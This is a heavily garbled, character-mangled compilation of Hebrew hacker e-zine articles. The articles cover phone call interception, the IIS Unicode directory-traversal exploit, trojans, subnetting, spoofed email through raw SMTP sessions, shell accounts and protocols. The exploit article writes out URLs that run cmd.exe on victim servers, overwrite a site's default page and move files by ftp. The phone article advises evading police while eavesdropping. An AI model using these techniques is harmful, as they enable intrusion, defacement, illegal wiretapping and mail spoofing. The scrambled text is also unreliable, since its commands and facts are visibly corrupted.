ישיא בשחמ םג אוהש ןופאלפ ןימ ומכ םיבשחוממ שממ םינופאלפ לש המישר הנהו%
ricsson M&9+.
Nokia ;++* &o44unicator
3ie4ens ,&3=

הז תא לצנל רשפא #יא p
nnnnnnnnnnnnnnnnnnnnn
+J*
לוקוטורפב #מות רשא רחא ןופאלפמ לנה םירישכמל טטוצל רשפא%
אמגודh
הפ היעבה המ !םירחא ןופלט ירפסמל טטוצל רשפא ןוסקירא רישכממ p
ישילש דצכ החישל ףרטצהל לוכי אל התאו הצור התאש רפסמ רוחבל לוכי אל התאש%
הז תא םישוע #יא p
הככ השועו #לש רישכמה תא חקול התאh
;*:*=;, Menu, )es, +, Rcl, )es, .3**ii, )es, .J%
מ %וח תורפסה ירדס לכ תא םיש לוכי התא תויבכוכה יתש םוקמב ** %
השוע התא הזה בצמהמ תאצל ידכ h Rcl, 3, L3 Xהעוט אל ינא םאY%
הזכ והשמ וא ול עירפהל ידכ םולכ תושעל לכות אל התא רבדמ והשימ עמשת התא%
וכו םייוסח וא םיישיא םינותנ הב םירבעומש החיש וא הנהמ החיש עמשתו לזמ #ל היהי ילואo%
ספתיהל אל רהזיהל #יא t
nnnnnnnnnnnnnnnnnnnnnn
+% םויב םימעפ תואמ שמח ףלאו הינשו הינש לכ הז תא תושעל אל בושח יכה קוחה,
םכל םמעשמ םא ןמז המכב םעפ%
9% ןווכתמ ינא דחא תותיצב!תחא םעפב תוינש םישימחמ רתוי וקה לע וראשית לע%
3% םכתוא עמשי יומס רטוש הזיא םא יכ %וחב 'וכו םיתתוצמ םתאש הז לע לוקב ורבדת לא, u
busted%
:% החפשמ בורק לש רישכממ וא םכלש רישכמהמ הז תא תושעל אל רתויש המכ וסנת,
הז תא העש ימ תא תחקל ואוביו םינותנ ונעערי םהש דע םכילע םילוע םא יכ,
ונממ הז תא םתישעש ימ לא אלא #ילא ועיגי אל םה%
=% ספתיהל אל%
אשונל םירושק םיגשומ ttt
nnnnnnnnnnnnnnnnnnnnnnn
8M7h הז לוקוטורפל דחוימב תיטוחלא תשר לש טסקט תפש X8"PY%
ht4h תילטיגיד טסקט תפש%
#ele0"3h םהינימל ססיברס הל םיפסות רשא םינופלט תכרעמ%
םיטידרק ttt
nnnnnnnnnnn
הז טסקט בותכל יוכיסה תא יל הנתנש הבוהאה יתחפשמל הדות לכ םדוק%
וכו םיילגר !םיידי יל ןתנש #כ לע םיהולאל הדומ ינא הז ירחאo%
םתס םתס חחח%
ןמז הברה רבכ רקירפ !ילש קיתו רבחל טידרק הפ שי ! Phone7*03r%
רתאלו .הז #ירדמ תביתכב יל רזעש לע ול תדחוימ הדות www%astalaVista%co4%
By Pirs¡i]ng
Razor - םינוקית
+J+
דוקינוי תרזעב םירתאל הצירפ
אובמ
ב אצמנש גאב אוה דוקינוי iis :%*/=%* ה יתרש םהש web לש winN#/win9k רשפאמ גאבה
.קוחרמ סוד תודוקפ ליעפהל ףקותל
הירוסיה תצק
ב יתבשי ינאש הפוקתב( םינש המכ ינפל bbs ב הלגתה םיליטנפניא םידלי לש םיקחשמ יתדרוהו
iis 3%* ב םג יל הארנו 9%* ארקינש גאב double dot
ידי לע טושפ םיצור םש תוירפס הזיא תוארל םישנאל ןתנ אוה
$הזכ והשמ ומשר םהש הז
www%so4eserVer%co4/%%<%%
ה תא ומגרתש הז דידי לע טולקב ותוא ופקע לבא צטאפ הררחיש טפוסורקימ
%% ןפדפדה לש בתכל
טמרופ ללכב הז דוקינוי עדי אלש ימל ןכבו . הז תא םכל רפסמ ינא המל םילאוש חתב םתא
ובש תוד לבאדה לש )תצק הנושו( שדח לוגליג אוה דוקינוי ןיבמ אל ןיידעש ימלו . טסקט תביתכל
דוקינוי תינבתל ( ה תא םימגרתמ%
#שמהב ןודא ינא הזב לבא גאבה לש לוצינה תא #בסמ הפיט הז תונוש תופשב #מות דוקינוי%
םיאתמIss תרש תאיצמ
אוה םייוסמ תרש םא קודבל ידכ
iss:%*/=%*
טרופל טנלט תושעל #ילע .* םש םושרלו
H"$ /
הז םא רטנא םיימעפ %וחלל זאו
iss
רבד הזכ םושרי הז
H##P/+%+ =*+ Not 3uIIorted
3erVerh MicrosoQt!,,3/:%*
$ateh -ri, +J Mar 9**+ +=h3*h3J GM#
&ontent!#)Ieh te't/ht4l
&ontent!7engthh +9+
ל בל םימש םתא
iss/:%*
p
םירווע םתא זא אל םא

Xe'IloitY לוצינה
ותוא קרפנ הז ירחאו טושפה לוצינה םע ליחתנ בוט
אבה רבדה תא םושרלו ריירולפסקאב ןולח חותפל לוכי התא םיאתמ תרש התאצמש ירחא
httIh//www%3erVerNa4 e%co4/scriIts/%%lc+l;c%%/winnt/s)ste439/c4d%e'ep/csdirsch<
בוט
serVerna4e
ומצע תא ריבסמ יד
אבה רבדל רובענ
+J9
scriIts
ה תא ןסכאמ תרשה הבש הירפסה תאז
cgi
םיאבה םירבדה אובל םילוכי סטפירקס םוקמב ולש
sa4Iels
cgi!bin
_vti _ad4in
PVti Pbin
4sadc
%%lc+l;c%%
םילוכיש םינוש םימוגרת ןומה םג שי תופש הברהב #מות דוק ינש ללגב דוקינוי לש םוגרתה הז
ומוקמב דובעל
הנטק המישר הניה
%%lc+l+c%%
%%lc*l;V%%
%%lc*laQ%%
%%lc*lOQ%%
%%lc+l.s%%
%%lc+l;c%%
%%lc+lIc%%
/winnt/s)ste439/c4d%e'ep/
%בוק לא #תוא ליבומ אוה עובק תויהל #ירצ הזה קלחה
c4d%e'e
יצבוק ליעפמש %בוקה אוהש
i%bat and i%c4d
םתואש סודב תודוקפ לש ףסוא םיליכמש םיצבק םהש
c4d%e'e
הינשה ירחא תחא %ירמ
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii
ב אוצמל לוכי הז לע תצק דוע תעדל הצורש ימל $פיט
blacksun%bo'%sk
לע #ירדמ
batch Irogra44ing
iiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiiii
/c
תונתשיהל לולע הז רתאה וילע בשויש ןנוכה תוא הז
ןיינעמה עטקל וישכעו
sdirsch<
לש ןכותה תא הארמש סודב הדוקפ םצעב תאז
ch<
חוור םוקמב םינוש םירטמרפ ןיב דירפהל שמשמ - ה
םהילע בכעתיהל הצור ינאש םייתש שי לבא תודוקפ הברה יד דוע שי
+J3
איה הנושארה
echo
םיצבק רוצילו םיצבקל טסקט סינכהל הלוכי תאזה הדוקפה ןוכנ שומישב
%בוקל טסקט סינכהל רומאש( אבה רבדה תא תושעל םיסנמשכ לבאY h
httIh//Victi4%4achine/scriIts/%%lc*laQ%%/winnt/s)ste439/c4d%e'ep/csechos$Qacedsj
jsch<inetIub<wwwroot<deQault%asI
לעופ אל הז
תרזעב קיתעהל הז תושעל #ירצש המ
coI)
תא
c4d%e'e
ל
ch<,netIub<scriIts
ידי לע הז תא תושעל רשפא היהי זאו
httIh//www%hack4el%co%il/scriIts/c4d%e'ep/csechosblablablasjjsch<test%t't

איה הילע ריבסהל הצור ינאש הינשה הדוקפה
QtI
תרזעב רוציל םיכירצ םתא %בוק תולעהל םיצור םתא םא
echo
הדוקפה תא ליעפהל זאו םהב שמתשהל םיצור םתאש יפ יט פא תודוקפה לכ תא ליכמש %בוק
www%serV%co4//scriIts/%%lc+l;c%%/winnt/s)ste439/c4d%e'ep/csQtIs!
ssch<co44ands%t't
By y0g1-b3ar
+J:
ינייור$'ה לע #יקמה ךירדמה "
ליחתנ ואוב וישכעו%
םעפ לכ הז תרש ליעפהלו םכלש בשחמה לע תרש חותפל םתרטמש םיצבק םצעב םה םינייורט
הלוע םכבשחמש%
לעופ םצעב הז ךיא ?
כדב( #ילא חלשנש %בוקה תא חתופ התאש עגרב i%e'eY
תרש בשחמב #לצא חתפנ[3R0R] עבק ינייורטה תנכתמש םייוסמ טרופ לע
םהב תקבדנ התאש עדת אלש הככ םייונב םינייורטה יכ ..הזמ עדוי אל כדב התאו
םולכב דושחת אל התאו ןטנטק קחשמ #ל לעפיו ינייורטה לש %בוקה תא חתפת התא ..לשמל%%
בשחמה לע ינייורטה לחתוי ןמז ותואב םצעב לבא
ינייורטב תקבדנ הז עגרב םצעבו %בוקה םע היעב היה וליאכ האיגש תעדוה לבקת לשמלש וא
ירזכא
הרוק אל רבד םוש הרואכלו ..םהילע %חול התאש עגרבש הלאכ םג שיו%%
דירומ #לש בשחמה #ותב רבכ %בוקה תא #ל חלשש דליהו ינייורטב עוגנ התא רבכ הז עגרב לבא
םיצבק #ממ
חוקל ול שיש ימ לכ ..ינייורטב תקבדנש ירחאו[&7,N#] #לש יפ יאה תא סינכהל לוכי ..םיאתמ
בשחמל #ילא רבחתהלו תרשה לש טרופה תא ..תרש רותב
ומכ !םירבד הברה #ל תושעל רשפא עבק ינייורטה תא תנכתש שיאהש תודוקפ תרזעבוh
#סמה לש תונומת תוארל !תואמסיס תוארל !בשחמ יוביכ !תוירפיסל הסינכ !תואמסיס תבינג
#לש,
הברה הברהו !תועדוה חולשל !תוינכות ליעפהל !רבכעב טולשל !םור-ידיסה תא רוגסלו חותפל
רתוי%
סיפרוא קאב אוה םלועב רתויב םיירלופופה םינייורטה דחא[B"&/ 6R,--,&] יע תנכותש
c$c
תוכרעמל םג השיג רשפאמ אוה יכ !ירלופופ #כ לכ אוהו 8in N#
ןכוסמ רתוי וליפא ותוא השוע הז ןכלו !ררחוש ולש רוקמה דוק םגו%
תונורתפ
|||||||
i רשי ותוא קוחמ ..דושח #ל הארנ %בוקה םאו ..ריכמ אל התאש םישנאמ םיצבק לבקת לאt
i תארקנש תרדהנ הנכות הנשי u#he &leaneru םתוא תקחומו #בשחמב םינייורט תאצומש
i עובש לכ #לש סוריוו יטנאה תא ןכדע
i ומכ תודושח םילימ שפחלו סודה #רד ותוא תלעפהש יפל %בוקה תא חותפל לוכי התאh sock <
Iort < winsock < serVer הדושח תויהל הלוכיש #ל תארנש תרחא הלימ לכ וא
X%חלו 7 %בוקה לש הריפיסל סנכ 7 סודה תא חתפ $סודב %בוק חותפל יידכ edit Qilena4e%e'eY
תישיאה יתעד
םגו .םימימת םישנא לצנמ קר התא .%רופ תמאב אל התא יכ הצירפ ארקנ אל הז םינייורט יתעדל
םולכ הזמ דמול אל התא,
לק הזשו םידלי קחשמ הז הצירפש הילשאב #תוא ריאשי הזו%
םירבד חטבאלו %ורפל #יאו םילעופ םירבד #יא תעדל הצור תמאב התא םא%%
#סב יכ "הברהו "םיטסקט אורקלו דומללו תוצירפו החטבא לש םירתאל סנכהל #ל %ילממ ינא
חכ הז עדי לכה%
!!
תונעל חמשי ינאו ..םורופב תולאש לואשל)ריעהל)ביגהל םילוכי םתא
לעופ אוה #יאו ינייורט םצעב הז המ ןיבהל םכל יתרזעש הווקמ ינאו
By Rul3r
+J=
גנינבאס
אורקל וכישמת . תעדל םיצור . גניטנבאס הז המ%
האירקה ינפל תעדל יאדכש םירבד רפסמ h
"RP list ! list oQ the all M"& X4edia access controlY Nu4bers%
R,P list ! list oQ all the Routers%
$eQaultGate8a) ! the inIut chiI oQ the Router%
ףקוחה דגנ איהש הלועפ לכ וב תושעל ןיאו דבלב תוידומיל תורטמל אוה הפ בותכה רמוח לכ
הרקמ לכב לבא תושעל המ שיש אל%
הילא 000000 וא םידבוע םתא הילעש תשרה תא ריכהל ולכותש ידכ יסיסב טבמ ןתונ ינא%
גניטנבס ארקנש אשונה לע יסיסב טבמ םכל ןתא ינא וישכעh
המצע ינפב תיאמצע תיזיפ תשר תויהל לוכי ! תשרהמ קלח $גניטנבס,
המלשה תשרה לש הנבהמ םיוסמ חלפב תלפטמה,
תוינשימה תותשרה ראש םע המלשה תשרה לש תבותכ תת תקלוח וזכש תשר ללכ #רדב%
אבה םישרתב וטיבה אנאh
P P P P
2:2 232 292 2+2
P
2=2
P P P P
2J2 2N2 2.2 2;2
בשחממ והשמ חולשל םיצור ונחנא לשמל 3 בשחמל . רישי ןפואב %
וכו רשאי בשחמ לכש דע !ןמז חקי הז זא הליגרה #רדב הז תא השענ םאo%
רחא רודיש דוס םע הז תא השענ םא הרקי המ לבא p
ומכ Mnicast לשמל p
הז המ םילאוש םתא p Mnicast םיבשחמה לכ #רד לכה ריבעי אל רשא רודיש לש גוס אוה,
בשחמל הטאד חלשת ול םירמוא םתא . בשחממ 3 $םיבשחמה #רד רבעמ אלל תאז השעי אוה
:,=,J,N%
לוקוטורפ םא דבוע אל הזה רודישה גוס NetBuei, יכ #&P/,P םירפסמ !תויתוא םא דבוע אל
דבלב%
Xילש םדוקה #ירדמב דומלל וצור לוקוטורפה וא םיריכמ אל םתא םאY%
רטואר !וישכע XRouterY םאתהב תשרב היצמרופניאו תועדוה בתנמה הרמוח ןקתה ! בתנ אוה
םתרוצל%
-כ הלוע אוה !לוז טירפ אל אוה רטואר +*,*** לוחב רלוד %
וקסיס הרבחה לש םה רתויב םיבוט םירטוארהu%
יפיאה קוריפל רובענ וישכע X,PY םימרוג ינשל,
Net8ork ,d, Host ,d%
ב ליחתיש רוסא !יפיאל םיקוח +9N -ב םייתסיש רוסא ! * ! 99= %
+9N%*%*%+ אורקל וכישמת זאו וררבת זא המל םיעדוי אל םתא םא .חווטל %וחמ םג אוה%
ה אוה המ יפיאב ההזנ #יא ! Network, Host , ,$%
ל קלחתמ לכה 3 תוירקיע תוצובק h Xsubnet 4askY
אמגוד h ,Ih 1%g%8%K
1 g 8 K
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
class ah 2 N 2 2 H 2 2 H 2 2 H 2
+JJ
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
class bh 2 N 2 2 N 2 2 H 2 2 H 2
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
class & 2 N 2 2 N 2 2 N 2 2 H 2
!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
3ubnet Mask ! הלידבמו ידיא טסוהה המו !ידיא קרווטנה םהמ המ !המ הז המ הארמ איה
םהיניב%
ה אלל יפיא ל יוהיזל רובענ וישכע! 3MBN# M"3/%
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
class ah 2 + 2 2 +!+9N 2 2 +9J 2 2 +JNNN9+:2
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
class bh 2 +*2 2 +9.!+;+ 2 2 +J3.: 2 2 J==3: 2
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
class & 2+**2 2 +;9!993 2 2 9*;N+=9 2 2 9=: 2
nnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnnn
אמגודh
+==%9=%J;%:+ ! &lass B XOu( +== is between +9.!+;+[class B]Y
9+=%9=%J;%:+ ! &lass & XOu( 9+= is between +;9!993[class &]Y
J9%9=%J;%:+ ! &lass " XOu( J9 is between +!+9N[class "]Y
3NN%9%3%= ! Not allowed XOu( 3NN is out oQ li4it tY
9+3%9%9%* ! Not allowed XOu( ,P nu4bers rnot allowed to end with a *tY
הווקמ ינא ! טלקי הז ףוסב וארקת זא אל םא !יפוי ןכ םא !םיניבמ %
תשרב םידבועל תעדל יאדכש םיגשומ המכ דוע הנהו t
3witch ! תשרב ןהידעי לא םינותנה תוליבח ביתנ תא עבוקה תשר ןקתה,
תשרה #ותב עדימה תוליבח דעי תא עבוק%
$)na4ic ,P ! םלועב םויק רתויב %ופנה ! %רמינ יפ יא גוס,
הנושו שדח יפ יא עבקנ תמיוסמ תשרל םירבחתמ רשאכ םעפ לכ,
םישמתשמ לש יוהיזש אוה יפ יאה לש הזה גוסב היעבה,
ונתשי םינותנה שדחמ ורבחתישכש ןווכמ םינותנ לע #מתסיהל ןתינ אל !ביצי יתליבו השק%
3tatic ,P ! םויק רתויב %ופנ תוחפ !ימניד אלו חיינ יפ יא גוס ,
יוהיז תניחבמ רתויב לקהו רתויב ביציה אוה רוביח !תושדחה תרושקתה תויגולונכט בורב הנבומ,
םלועל יפ יא ותוא םע ראשי תשרל רבחתהש שמתשמ,
שמתשהל לוכי אוה םהב קרו וילע םינבומש רתוי וא דחא יפ יא שי בשחמ לכל%
םמעשמ רמוח הז הנאוב בלב םירמוא חטב םתאש םיעדוי ונחנאו םתינהנש הווקמ ונא זא,
תותשרב קסעתהל הצורש ימ לכל בושח אוה לבא םימעשמ אוה ילוא%
טפוסורקימ לש סרוק לש רמגה ןחבמב עיפומ הפ רמוחהמ יצח !ועדתש קר %
By PirsiNg & Zeh
+JN
נל ךרד ימינונא ראוד
תופסונ תוטיש תעדל בוט דימת לבא !הז תא תושועש תונכות שי םויהש עדוי ינא%
תרש s4It ינורטקלא ראוד חולשל רשפא וכרדו אצוי ראוד לע יארחאש תרש אוה
X אוה ולש לדחמה תרירב טרופ 9= Y%
דבוע הז הככוh
+%אצוי ראוד תרשל םירבחתמ
telnet netVision%net%il 9=
רחא ראוד תרש לכ וא%
9%תודוקפה ולאוh
H76 ! וא 67H החילשה לש רוקמה התאש עבוקו תרשה ינפל #תוא ההזמ%
N66P ! הככו #ילא תרשהמ טלפ הריזחמ םצעב איה לבא םולכ השוע אל הרואכלש הלועפ
תרשה לא #ניב רוביחה לש תוריהמה המו רבוחמ ןיידע התא םא קודבל רשפא%
gM,# ! תרשהמ קתנתמ( ...רורב ייד הזש בשוח ינאY
H7P ! [toIic] תמייוסמ הדוקפל רשקב הרזע%
H7P ! םיתרשה בורב המוד כדב( .תרשב שומישל תונתינש תודוקפה לש המישר גיציY
R3# ! ! המודכו חלוש תבותכ !וישכע דע םתסנכהש המ לכ תא קחומ
M",7 -R6M ! hraddressj חלושה תבותכ
$"#" ! בתכמה ףוג תא חתופו לאודה תביתכ לש #יראתה תא סינכמ%
"#MH ! ! בתכמה תא חלוש%
0R-L ! אמגוד .תרשב םייק שמתשמה םא קדובh ! VrQ) Rul3R
R&P# #6hrreciIientj ! #כבו תחא םעפמ רתוי תאזה הדוקפה תא םושרל ןתינ( דעיה תבותכ
דחא שיאמ רתויל חולשלY%
ףייוזמ ראוד םתלביק םא תולגל #יאp
ב ולכתסת
headers
לע ולכתסת זא חלשש ימ לש יפ יאה תא םיאור םתא זאו ראודה לש
תבותכה התוא אל וזש וארתו חלשש ימ לש תבותכה%
תורעהh
sראשה לכו םכלש יפ יאה תא םיחלוש םתא ימל ללוכ ! תומשרנ םכלש תולועפה לכ%
s #ות ראודה יתרש בורב תוליעפ ןיא םא כדב J* קתוני רשקה תוינש
sהז תא תושועש תונכות שי םויה%
sיסקורפ ירוחאמ הז תא תושעל יוצר
sיסקורפ םע רבחתהל תונתונ אל ןה בורל יכ תונכותב שמתשהל ידכ אל
ראוד יתרש לש המישרh
new4ail%neth9=
4ail%)ahoo%co4h9=
4ail%hot4ail%co4h9=
4ail%surQree%net%ilh9=
out%inter%net%ilh9=
4ail%air4ail%neth9=
4ail%geocities%co4h9=
4nsi%neth9=
hacker%co4h9=
Ili'%co4h9=
ids%neth9=
student%uO%edu%auh9=
istar%cah9=
total%neth9=
4ail%tQs%neth9=
ecis%co4h9=
4indsIring%co4h9=
IoI4ail%uc%eduh9=
+J.
4ail%iaw%on%cah9=
Id'%sisna%co4h9=
earing%4)h9=
chollian%daco4%co%krh9=
all!)ours%neth9=
4ail%atcon%co4h9=
Quture%neth9=
aloha%neth9=
oVnet%co4h9=
connect%reach%neth9=
Valle)!internet%neth9=
Valle)net%co4h9=
4ilo%cQw%co4h9=
scs%august%co4h9=
hiwaa)%neth9=
$ הרעה 9= טרופה הז םשהמ קלח אל הז
ילש תורעה הז (0 0( ה #ותב בותכש המ $המגודל גול
!!!
&onnected to netVision%net%il on Iort 9= /iן'זיווטנ לש רברסל רבחתמi/
99* QtI%netVision%net%il 3M#P 3end4ail .%;%3/.%;%3q Mon, 9 "Ir 9**+ +.h:Nh+.
s*9** X,3#Y /iםהלש ליימיאה תרש לש אסריגו אלמ #יראת לבקמi/
helo ihc /iםשב ההדזמ ihci/
9=* QtI%netVision%net%il Hello diuI!9*=!9*;%inter%net%il [9+3%.%9*=%9*;], Ileased to
4eet )ou /iםהלש תכרעמב טלקנש יפייאה םע הבוגת לבקמi/
helI /iתודוקפה לכ תא תוארלו הרזעל השקב חלושi/
9+:!#his is 3end4ail Version .%;%3 %ירמ תרשהש הנכותה לש0( אסריגi/
9+:!&o44andsh /iתודוקפה לכ תא לבקמi/
9+:! H76 H76 M",7 R&P# $"#"
9+:! R3# N66P gM,# H7P 0R-L
9+:! KPN 0RB
9+:!-or 4ore inQo use uH7P rtoIicju%
9+:!#o reIort bugs in the i4Ile4entation send e4ail to
9+:! send4ailk&3%Berkele)%$M%
9+:!-or local inQor4ation send e4ail to Post4aster at )our site%
9+: nd oQ H7P inQo /iתודוקפה תא לבקל םייסi/
4ail Qro4h rihcknetVision%net%ilj /iחולשל הצור ינאש ליימיא תבותכה תא תרשל רמוא
הנממi/
9=* rihcknetVision%net%ilj%%% 3ender ok /iתרשהמ רושיא לבקמi/
rcIt toh rweb4asterknetVision%net%ilj /iחולשל הצור ינא ימל תרשל רמואi/
9=* rweb4asterknetVision%net%ilj%%% ReciIient ok /iתרשהמ רושיא לבקמi/
data /iאטאד הדוקפ חלושi/
3=: nter 4ail, end with u%u on a line b) itselQ /iםישל תרמואש תרשהמ הבוגת לבקמ
העדוהה ףוסב הדוקנi/
subeecth test /iהעדוהה אשונ תא עבוקi/
he) 4an /iהעדוהה תא בתוכi/
whats uIp
ihc r*'
% /iהעדוהה תא רוגסל תרשל דיגהל יידכ הדוקנ בתוכi/
9=* 3""*=9:. Message acceIted Qor deliVer) /iהחלשנ העדוההש תרשהמ רושיא לבקמi/
nooI /iרבוחמ ןיידע ינאש תוארל יידכ פונ הדוקפ חלושi/
9=* 6/ /iרבוחמ דוע ינאש עדוי ינא הככו תרשהמ הבוגת לבקמi/
VrQ) ihc /iםשב שמתשמ תרשב שי םא קדוב ihci/
+J;
9=9 &annot 0R-L userq tr) R&P# to atte4It deliVer) Xor tr) QingerY /iהבוגת לבקמ
שמתשמ הזכ ןיאש תרמואש תרשהמ תישילשi/
Ouit /iתרשהמ האיצי הדוקפ חלושi/
99+ QtI%netVision%net%il closing connection /iתרשהמ האיצי תעדוה לבקמi/
$isconnected Qro4 netVision%net%il /iקתונ רוביחהi/
By VoRtex
Rul3r תופסותו םינוקית
+N*
Shell תונובשח
המדקהh
nnnnnn
המ םשל !ללאש לזאזעל הז המ תעדל םיצורש םישנא לש תושקב תואמ ירחא בתכנ הזה #ירדמה
לנה #ירדמב ביחרנ הז לכ לע <ללכב בוט אוה המלו וב םישמתשמ #יא !דעונ אוה%
ללאש ןובשח והמp
nnnnnnnnnnnnnnn
טושפ טנלט תרזעב וילא םירבחתמ !,ונחנא+ חוקלהש !טפירקס םצעב אוה ללאש ןובשח%%%
קחורמה בשחמה לכ לע טלוש התא םימעפלו...תקחורמ סקוניל)סקינוי תכרעמ םצעב אוה ללאש
סודניו #ל שי םא וליפא #לש יתיבה בשחמה #רד ;. רחא רבד לכ וא ! %%%
טא'צ יתרש ןיקתהל !טנרטניאב שולגל רשפא ללאשה #רד -#P, םכל אבש רחא רבד לכו
דע %ירהל םירשפאמ םיליגרה םיתרשה ללכ #רדב לבא...שארל 3 תינמז וב םיתרש %
דעונ אוה המ םשלp
nnnnnnnnnnnnnnnn
ןיאש םישנאל רקיעב דעוימ אוה לבא !תוחפ תובושחו תובושח תורטמ הברהל דעונ ללאשה ןובשח
ןיקתהל ילב !םהל הנקמ סקונילהש םיתורישב שמתשהל םיצור תאז לכב םה לבא !סקוניל םהל
םכלש בשחמב ותוא%
םכל ןיא יכ תינדי תובתכנ וב תודוקפה לכ יכ- סקונילב ןויסינ תריבצ !דומילל שמשמ ללאשה דוע
סוד-ה תכרעמ תא ריכזמ והשכיא אוהו !סודניוב ומכ יפארג #סמ םוש ללאשב%
םכתוא #בסל לוכיו יקוח אל שממ הזש תורמל...הצירפ ןבומכ אוה ללאשב ירקיע שומיש דוע
חוכ ברו ירשפא תאז לכב הז !ללאשה לעב לע תלפונ תוירחאה לכ יכ !לודגבtt
תוכרעמ לע לעופ אוה עצוממבשכ !דואמ ריהמ תרושקת ספ לע םילעופ ללאשה יתרש בור #3 ףאו
ומכ םינקתהל עיגמ 6&:. !לש תוריהמל עיגמ רישכמה !הז המ עדוי אלש ימ תוטושפ םילימבש
הינשל טייב-הגי'ג שמחמ רתויtt
!תונקל הלוכי סקינוי תכרעמ קרש תוכיאב לכהו !םינווגמ םיתרש ןיקתהל םילוכי םתא ללאשב
!םניח םינתינש םיללאשב !תאז תמועל .םידבוע םתא התיאש תוריהמה לע רבדנ אלשו...םכל
הברה םיספותש םיתרש וא םיטא'צל םיטוב %ירהל םכל תונתונ אלו תולבגומ דואמ תויורשפאה
דחפה ילב !ללאשב תוסנתהל םיטילחמ תמאב םתא םאש #כ !תורחא תולבגה הברה דועו ןורכיז
םלשל םכל היהי ףידע !סקוניל וניקתת םא בשחמה תא םכמצעל סורהל לש . דע 9* םירלוד
תכרעמב ומכ קוידב ירשפא רבד לכ טעמכ וב תושעל םכל רשפאייש !םדקתמ ללאש ןובשחל
הליגר סקינויt
ללאשב תויסיסב תודוקפ
nnnnnnnnnnnnnnnnnnnn
שומישל תויסיסב תודוקפ המכ ןתינ !,רבדה ותוא+ סקוניל)סקינויב רבד םיעדוי אלש ולאל !בוט
םיריכמ םתאש ולאמ תונוש תודוקפה יכ..םכלש ללאשב%%%
הרעהh
nnnnn
בל תמושת הזל ושידקתש הככ !תונטקל תולודג תויתוא ןיב לדבה שי סקינוי תוכרעמבt
&d סודה תכרעממ תרכומה הדוקפה התוא קוידב...םיצור םתאש היירפסל סנכיהל !%
cat הייפצל םיבתוכ םתא ותוא %בוקה ןכות תא תוארל םכל ןתונש% !
8get ! הדיל ובתכת ותוא קנילהמ %בוקה תא דירוהל הנכותל תרמואה הדוקפ%
l)n' - ןפדפד והז לבא !ולהבת לאש הככ !הקיפארג םוש ילב ןבומכ !תיתימא &הנכות& יהוז
תילאוטסקט הרוצב םירתא חתופ אוה יכ....םלועב רתויב ריהמה טנרטניאהt
4acs! ! תויורשפא הברה דועו !"תנכתל !טסקט יצבק #ורעל םכל תנתונש &הנכות& בוש
תורחאt
+N+
G(iI ! ! גוסמ טנרטניאהמ םידירומ םתאש %ווכמ %בוק תחיתפל הדוקפ %g(
#ar ! tar ! ה םע דחייב ללכ #רדב אבש %וויכ דוע והז !G1,P גוסמ םיצווכמ םיצבק חתופ אוהו %
dir בשוח ינא טרפל #רוצ ןיא...ונלוכל תרכומ הדוקפ !
Gcc ! &<&ss סקונילב טעמכ וידעלב זוזל רשפא יאש ה תפשל רלייפמוקה%%%
תדוקפ תרזעב תושקובמה תונכות)תודוקפל הרזעה תא תוארל רשפאש !ןייצל בושח דועh
helI!!&o44and
תודוקפה ינש ןיב חוור םעt
ושמתשה !סקונילה לועפתל רחא רבד לכ וא תודוקפה תא קמועל רתוי אורקל םיצור םתא םא
תדוקפבh
4an
דוע אורקל םיצור םתא וילעש רחא רבד לכ)הנכות)הדוקפה תא הדיילו%
המכ םכל ןתינ !הנה זא !םיללאש גישהל רשפא הפיאמ תבותכ המכ םיצור חטב םתא וישכע !בוט
תאז לכב לבא !#כ-לכ םיצלמומ אלש םימניח םיללאש לש תבותכ%%%
nether%net
Qreeshell%org
www%c)berar4)%co4/lists !תאז לכב לבא !םיללאש לש תומישר םש שי ןיידע םא עדוי אל ינא
וסנתt
לש טא'צה יתרש #רד אוצמל רשפא םולשתב םיללאש -N#, $"7N#
םירדחבh m3H773, 3H77,B6MN&R3
םיבוט םיללאש תיינקל תומוקמ ןומה םכל םינתונשt
הנה זא !םכלש ללאשל רבחתהל #יא םיעדוי אל תאז לכב םתא םאh
telnet )ourshellhere ! טרופב 93
BY CnTaX
+N9
.םילוקוורפ
.םישוע םה המו םימייקה םילוקוטורפה יגוס םא ליחתנ לכ םדוק
.תומייקה תותשרה יגוס ינש !ליחתנש ינפל הנטק הרעה
7"N ! תימוקמ תשר
8"N ! מ רתוי לע תערתשמש תשר +9 רדח ותואב םיבשחמ %
.םיגוס ינשל םיקלחתמ םילוקוטורפה לכ
+% &onnectionless Irotocol F אלל רחא רבד לכ וא עדימ(העדוה חלוש רשא לוקוטורפ אוה
רתוי שימג אוהו רתוי רהמ דבוע לוקוטורפה הככ .ןעמנהמ רושיאל הנתמה%
9% &onnection oriented Irotocol F רחא בשחמל עדימ(העדוה חלוש רשא לוקוטורפ אוה
תיטיא היהת םינותנה תרבעהו רתויב חטבואמ לנה לוקוטורפה !ןעמנה רושיאל ןיתממ אוהו
הבושתל הנתמהה ללגב רתוי%
' ה לש םילדומה תחת םילוקוטורפה תדובעל רובענ וישכע 63, .
5PS
63,
Not 3IeciQied "IIlication
"RP, R"RP Presentation
,P 3ession
#&P, M$P #ransIort
#elnet, -#P, 3M#P, 3NMP, H##P Network, $ata 7ink, Ph)sical
.םירפסמל םיוות תרמה לע דבוע אוהש ללגב ..ראשהמ ןפוד אצוי רשא לוקוטורפ שי
ARP - Address Resolution Protocol.
.ןיינעמ שממ אל אוה לבא ! תושדח תרבעה לע דבוע רשא דחא שיו
NNTP - Network News Transport Protocol.
הלאל םיישומיש לבא !דחא לכ יע שומישב םיאצמנ אלש םילוקוטורפ לש המישר ןתא ינא הפ
.םתיא םידבועש
. השוע אוה המ " לוקוטורפה םש
תואיגש תרקבל שמשמ
,&MP F ,nternet &ontrol Message
Protocol
תאצקה ,P תשרל ינדי ןפואב
$H&P F $)na4ic Host &onQiguration
Protocol
' ב םילולסמה רוטקו תעיבק #&P/,P R,P F Routing ,nQor4ation Protocol
